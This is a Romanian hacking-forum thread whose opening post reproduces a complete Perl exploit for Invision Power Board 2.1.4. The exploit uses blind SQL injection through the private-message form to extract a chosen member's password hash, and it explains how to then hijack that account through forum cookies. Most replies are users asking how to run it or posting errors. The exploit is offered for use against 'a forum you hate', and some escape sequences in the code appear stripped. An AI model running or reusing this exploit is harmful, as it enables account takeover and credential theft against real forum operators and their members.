Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.
Nou pe simpatie:
pysy_mik la Simpatie.ro
Femeie
24 ani
Teleorman
cauta Barbat
25 - 44 ani
Hacking and more... / Exploituri si POCs / IPB 2.1.4 Password Steal Moderat de Shocker
Autor
Mesaj Pagini: 1
epic
User

Inregistrat: acum 18 ani
Postari: 1896


Code:

#!/usr/bin/perl 
############################################################################# 
## IPB <=2.1.4 exploit (possibly 2.1.5 too)                                ## 
## Brought to you by the Ykstortion security team.                         ## 
##                                                                         ## 
## The bug is in the pm system so you must have a registered user.         ## 
## The exploit will extract a password hash from the forum's data base of  ## 
## the target user.                                                        ## 
## You need to know the target user's member ID but it's not difficult to  ## 
## find out, just look under their avatar next to one of their posts.      ## 
## Once you have the hash, simply unset all forum cookies and set          ## 
## member_id to the target user's member id and pass_hash to the hash      ## 
## obtained from the database by this script.                              ## 
##                                                                         ## 
## Usage:                                                                  ## 
##   $ ./ipb                                                               ## 
##   IPB Forum URL ? forums.example.com/forums                             ## 
##   Your username ? krypt_sk1dd13                                         ## 
##   Your pass ? if_your_on_nix_this_gets_hidden                           ## 
##   Target userid ? 3637                                                  ## 
##                                                                         ## 
##   Attempting to extract password hash from database...                  ## 
##   537ab2d5b37ac3a3632f5d06e8e04368                                      ## 
##   Hit enter to quit.                                                    ## 
##                                                                         ## 
## Requirements:                                                           ## 
##   o Perl 5                                                              ## 
##   o LWP 5.64 or later                                                   ## 
##   o Internet access                                                     ## 
##   o A forum you hate/dislike                                            ## 
##   o A user on said forum                                                ## 
##   o 32+ PMs left till your inbox is full, if not you can still delete   ## 
##     PMs from your inbox as the successful ones come through             ## 
##                                                                         ## 
## Credit to: Nuticulus for finding the SQL injection                      ## 
##                                                                         ## 
## Have fun, you dumb skiddie.                                             ## 
############################################################################# 

use HTTP::Cookies; 
use LWP 5.64; 
use HTTP::Request; 

# variables 
my $login_page = '?act=Login&CODE=01'; 
my $pm_page = '?act=Msg&CODE=04'; 
my $pose_pm_page = '?'; 
my $tries = 5; 
my $sql = ''; 
my $hash = ''; 
my $need_null = 0; 
my $i; 
my $j; 
my @charset = ('0' .. '9', 'a' .. 'f'); 
my %form = (act      => 'Msg', 
   CODE      => '04', 
   MODE      => '01', 
   OID      => '', 
   removeattachid   => '', 
   msg_title   => 'asdf', 
   bbmode      => 'normal', 
   ffont      => 0, 
   fsize      => 0, 
   fcolor      => 0, 
   LIST      => ' LIST ', 
   helpbox      => 'Insert Monotype Text (alt + p)', 
   tagcount   => 0, 
   Post      => 'jkl'); 
    

# objects 
my $ua = LWP::UserAgent->new; 
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0); 
my $resp; 

# init the cookie jar 
$ua->cookie_jar ($cj); 

# allow redirects on post requests 
push @{ $ua->requests_redirectable }, "POST"; 

# get user input 
print 'IPB Forum URL ? '; 
chomp (my $base_url = <STDIN>); 
print 'Your username ? '; 
chomp (my $user = <STDIN>); 
$form{entered_name} = $user; 
print 'Your pass ? '; 
# systems without stty will error otherwise 
my $stty = -x '/bin/stty'; 
system 'stty -echo' if $stty;      # to turn off echoing 
chomp (my $pass = <STDIN>); 
system 'stty echo' if $stty;      # to turn it back on 
print "n" if $stty; 
print 'Target userid ? ';   # it'll say next to one of their posts 
chomp (my $tid = <STDIN>); 

# parse the given base url 
if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url } 
if ($base_url !~ m#/$|index.php$#) { $base_url .= '/' } 

do { 
   $resp = $ua->post ($base_url . $login_page, 
      [ UserName => $user, 
        PassWord => $pass, 
        CookieDate => 1, 
      ]); 
} while ($tries-- && !$resp->is_success()); 

# reset tries 
$tries = 5; 

# did we get 200 (OK) ? 
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" } 

# was the pass right ? 
if ($resp->content =~ /sorry, the password was wrong/i) { 
   die "Error: password incorrect.n"; 
} 

# get ourselves a post_key (and an auth_key too with newer versions) 
do { 
   $resp = $ua->get ($base_url . $pm_page); 
} while ($tries-- && !$resp->is_success()); 

# reset tries 
$tries = 5; 

if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" } 
if ($resp->content =~ m#<inputs+?type=["']?hidden["']?s+?name=["']?post_key["']?s+?value=["']?([0-9a-f]{32})["']?s+?/>#) 
{ 
   $form{post_key} = $1; 
} else { 
   die "Error: couldn't get a post key.n"; 
} 
if ($resp->content =~ m#<inputs+?type=["']?hidden["']?s+?name=["']?auth_key["']?s+?value=["']?([0-9a-f]{32})["']?s+/>#) 
{ 
   $form{auth_key} = $1; 
} 

# turn off buffering so chars in the hash show up straight away 
$| = 1; 

print "nAttempting to extract password hash from database...n "; 

OFFSET: 
for ($i = 0; $i < 32; ++$i) { 
   CHAR: 
   for ($j = 0; $j < @charset; ++$j) { 
      # reset tries 
      $tries = 5; 
      print "x08", $charset[$j]; 
      # build sql injection 
      $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR(' 
           . (join (',', map {ord} split ('', $user))) . ') FROM ' 
           . 'ibf_members WHERE id = ' . $tid . ' AND MID(' 
           . 'member_login_key, ' . ($i + 1) . ', 1) = CHAR(' 
           . ord ($charset[$j]) . ')'; 
      $form{from_contact} = $sql; 
      $resp = $ua->post ($base_url . $post_pm_page, %form, 
         referer => $base_url . $pm_page); 
      if (!$resp->is_success()) { 
         die "nError: " . $resp->status_line 
           . "n" if (!$tries); 
         --$tries; 
         redo; 
      } 
      if ($resp->content =~ /sql error/i) { 
         if ($need_null) { 
            die "Error: SQL error.n"; 
         } else { 
            $need_null = 1; 
            redo OFFSET; 
         } 
      } elsif ($resp->content !~ /there is no such member/i) { 
         # we have a winner ! 
         print ' '; 
         next OFFSET; 
      } 
   } 
   # uh oh, something went wrong 
   die "nError: couldn't get a char for offset $in"; 
} 
print "x08 x08nHit enter to quit.n"; 
<STDIN>;



_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!

pus acum 18 ani
   
byjunior
Elite Member

Din: Your PC
Inregistrat: acum 18 ani
Postari: 651
aham sh c fac cu asta de mai sus ? k nam inteles nimic din el

_______________________________________

Tv online

pus acum 18 ani
   
deuSdeTe
Little Kevin

Inregistrat: acum 18 ani
Postari: 77
deci iarta'ma bvjunyor ca tii zic dar cum poti afirma ca nu ai inzteles nimic?? scrie chiar la inceput ce face... adevarat e scris in engleza... dar presupun ca stii englez.. fii mai atent la detalii alta data si dupa aceea posteaza clar ce vrei sa afli si o sa primesti raspuns

pus acum 18 ani
   
byjunior
Elite Member

Din: Your PC
Inregistrat: acum 18 ani
Postari: 651
scuzati-ma

_______________________________________

Tv online

pus acum 18 ani
   
BaTuSaY
Little Kevin

Din: brasov
Inregistrat: acum 18 ani
Postari: 71
interesant..dar faza asta merge la orive fel de usere?adik...user de forum,site,mirc....si altele care mai sunt!

_______________________________________
<a href="http://www.danasoft.com"><img src="http://www.danasoft.com/sig/Sociopatie.jpg" border="0"></a><div style="font-family:arial,sans-serif;font-size:11px;"><p>Sign by Dealighted - <a href="http://www.dealighted.com">Coupon Codes</a></p></div>

pus acum 18 ani
   
Dynamyc
Elite Member

Din: de peste tot
Inregistrat: acum 18 ani
Postari: 836
a reusit cineva??

_______________________________________




pus acum 18 ani
   
N30
Little Kevin

Inregistrat: acum 18 ani
Postari: 82
Imi da eroare:

Code:

0Error: SQL error.



_______________________________________


pus acum 17 ani
   
nyk_nicosu
Membru nou

Din: De pe Marte
Inregistrat: acum 17 ani
Postari: 14
Ma invata si pe mine cineva VBS ??? plz help makar un link de vbs mai nou 2006-2007 unde sa nu fie cu payment!!!  mentionez ca nu stiu nik in vbs

_______________________________________
Noi traim prin încurajare si murim fara ea încet, trist si furios...

pus acum 17 ani
   
ixion
Master of 127.0.0.1

Din: filiasi
Inregistrat: acum 17 ani
Postari: 187
downloadeaza visual basic 6 de pe site'uri de torente...de ex poti sa il iei de aici:www.isohunt.com

_______________________________________
kiar daca sunt mic visez sa ajung mare

pus acum 17 ani
   
sergyu1
Grand Master

Din: Curiozitate
Inregistrat: acum 17 ani
Postari: 266
neinteresant nu ma intereseaza asa ceva

_______________________________________
Dont put more idiot questions and search Google...
Today Google is you'r friend search him...
Enter here for other forum for hack with lots of things 

pus acum 17 ani
   
Shocker
Super Moderator

Din: localhost
Inregistrat: acum 18 ani
Postari: 2084
Daca nu te intereseaza NU mai posta, nu e prima data... Incearca sa te abtii

LE: Stii ceva? Ban 2 zile

Modificat de Shocker (acum 17 ani)


_______________________________________
ShockingSoft is back
Freakz only
Comics of the day

pus acum 17 ani
   
nestat
Membru nou

Inregistrat: acum 17 ani
Postari: 2
MI-a dat eroare asta

Error: couldn't get a post key.n at nume.pl line 134, <STDIN> line 4.


Rog pe cineva sa imi spuna ce inseamna


pus acum 17 ani
   
Pagini: 1  

Mergi la